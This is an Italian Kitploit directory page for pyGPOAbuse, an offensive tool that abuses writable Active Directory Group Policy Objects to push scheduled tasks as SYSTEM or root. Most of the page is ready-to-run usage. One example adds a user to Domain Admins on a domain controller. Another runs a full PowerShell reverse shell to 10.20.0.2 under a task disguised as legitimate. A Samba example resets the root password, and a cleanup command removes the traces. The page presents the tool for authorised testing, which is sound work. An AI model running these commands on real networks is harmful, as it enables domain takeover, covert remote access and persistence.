Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
pyGPOAbuse — Implementazione Python parziale di SharpGPOAbuse | Kitploit
Strumenti/GitHubGitHub/hackndo/pygpoabuse
Escalation di PrivilegiExploitMovimento LateralePost-ExploitPenetration Testing
GitHubhackndo/pygpoabuse

pyGPOAbuse

Implementazione Python parziale di SharpGPOAbuse

Vedi Repository
5857112 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

pyGPOAbuse

Aggiunte di Filtri di D4RKMATT3R

  • AVVISO: Questo è stato testato solo brevemente in un ambiente AD locale; non mi assumo alcuna responsabilità per comportamenti imprevisti o malfunzionamenti. Viene fornito così com'è, solo per test autorizzati, interamente a proprio rischio.
  • Ora supporta il targeting filtrato di utenti o host, simile a SharpGPOAbuse.
  • Scenario: Il GPO è collegato al dominio Active Directory, quindi le attività verrebbero applicate a tutti gli oggetti interessati all'interno del dominio (utenti/host), generando un'enorme quantità di rumore e artefatti inutili. Pertanto, si preferisce un approccio più mirato, eseguendo comandi su target specifici, ad esempio il controller di dominio.
root@kitploit:~
Targeting di host/utente tramite filtri (rispecchia SharpGPOAbuse --FilterEnabled):
  -filter-enabled       Abilita il targeting GPO per host/utente in modo che l'attività pianificata venga eseguita solo per un host/utente specifico
  -target-dns-name FQDN
                        Attività computer: DNS/FQDN dell'unico host che dovrebbe eseguire l'attività (es. dc01.corp.local)
  -target-username DOMINIO\UTENTE
                        Attività utente: solo questo utente elabora l'attività (formato: DOMINIO\nomeutente)
  -target-user-sid SID  Attività utente: SID dell'utente target (opzionale, corrispondenza più robusta)

Esempio

root@kitploit:~
# Aggiungi utente di dominio e aggiungi ai Domain Admins tramite controller di dominio
python3 pygpoabuse.py red.local/user:Testing123 -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate  -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local

Descrizione

Implementazione Python parziale di SharpGPOAbuse di @pkb1s

Questo strumento può essere utilizzato quando un account controllato può modificare un GPO esistente applicato a uno o più utenti e computer. Crea un'attività pianificata immediata come SYSTEM sul computer remoto per il GPO computer, o come utente connesso per il GPO utente.

Il comportamento predefinito aggiunge un amministratore locale.

Esempio

Come usare

Utilizzo base

Aggiungere l'utente john al gruppo degli amministratori locali (Password: H4x00r123..)

root@kitploit:~
./pygpoabuse.py DOMINIO/utente -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Utilizzo avanzato

Esempio di reverse shell

root@kitploit:~
./pygpoabuse.py DOMINIO/utente -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
    -powershell \
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
    -taskname "Attività Completamente Legittima" \
    -description "Questo è legittimo, per favore non cancellare" \
    -user

Pulizia

Eliminare l'attività pianificata dopo l'esecuzione.

root@kitploit:~
./pygpoabuse.py DOMINIO/utente -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --cleanup

Utilizzo con Samba AD

Questo strumento può essere utilizzato anche con domini Samba AD. Crea un job immediato come root sul computer remoto per il GPO computer.

Innanzitutto, creare uno script Bash o un file ELF.

root@kitploit:~
#!/bin/bash
echo "root:1234" | chpasswd

Quindi eseguire lo strumento con l'argomento --linux-exec.

root@kitploit:~
./pygpoabuse.py DOMINIO/utente:password -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --linux-exec /percorso/dell/eseguibile

Esempio

Crediti

  • @pkb1s per SharpGPOAbuse
  • @airman604 per schtask_now.py
  • @SkelSec per msldap
Scarica lo strumento